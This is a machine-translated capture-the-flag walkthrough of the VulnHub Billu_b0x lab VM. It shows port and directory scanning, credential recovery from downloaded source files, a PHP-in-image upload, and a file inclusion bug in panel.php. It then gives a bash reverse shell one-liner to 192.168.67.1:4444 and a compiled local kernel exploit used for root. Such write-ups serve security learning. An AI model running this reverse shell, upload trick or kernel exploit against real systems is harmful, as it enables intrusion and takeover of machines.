For Billu_b0x test

Real test

NET host mode
for experimental purposes: to get root privileges (prompt start from the web application)
Project location: https://www.vulnhub.com/entry/billu-b0x,188/

Host found

1	root@kali:~# arp-scan -l

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

root@kali:~# nmap -T4 -A -v 192.168.67.138 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA) | 2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA) |_ 256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: --==[[IndiShell Lab]]==--

Get Permissions

Tip using sql injection, the first time think of post injection (technology, however), but to no avail
blasting directory

1	root @ kali: ~ # dirb http://192.168.67.138 /usr/share/dirb/wordlists/big.txt

1 2 3

http://192.168.67.138/add # file upload no echo http://192.168.67.138/in #phpinfo http://192.168.67.138/test # prompt file contains

Download Source
get request to no avail, post requests

passwd, icaand rootcan log ssh
download c.php find mysql account password

1 2	billu B0x_billu

Login http://192.168.67.138
discovered a new upload point

check the file contents can not be achieved renamed, upload pictures horse

1	copy 1.jpg/b+1.php 2.jpg

Into the http://192.168.67.138/uploaded_images/
analysis panel.phpfound that the file contains

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21

if(isset($_POST['continue'])) { $dir=getcwd(); $choice=str_replace('./','',$_POST['load']); if($choice==='add') { include($dir.'/'.$choice.'.php'); die(); } if($choice==='show') { include($dir.'/'.$choice.'.php'); die(); } else { include($dir.'/'.$_POST['load']); }

Rebound shell

URL encoding

1	echo "bash -i >& /dev/tcp/192.168.67.1/4444 0>&1" | bash

1 2	www Data @ indishell: / var / www $ id` uid = 33 (WWW data) gid = 33 (www) data groups = 33 (WWW data)

Put right

1 2	Check kernel version uname -a # cat / etc / issue # Display system version

Use local privilege escalation exp
downloaded to the local

1 2	chmod 777 37292.c # empower gcc 37292.c -o test # compiler

carried out

1	www-data @ indishell: / tmp $ ./test

It ends here

If wrong, please contact [email protected]

Original: Large column  for Billu_b0x test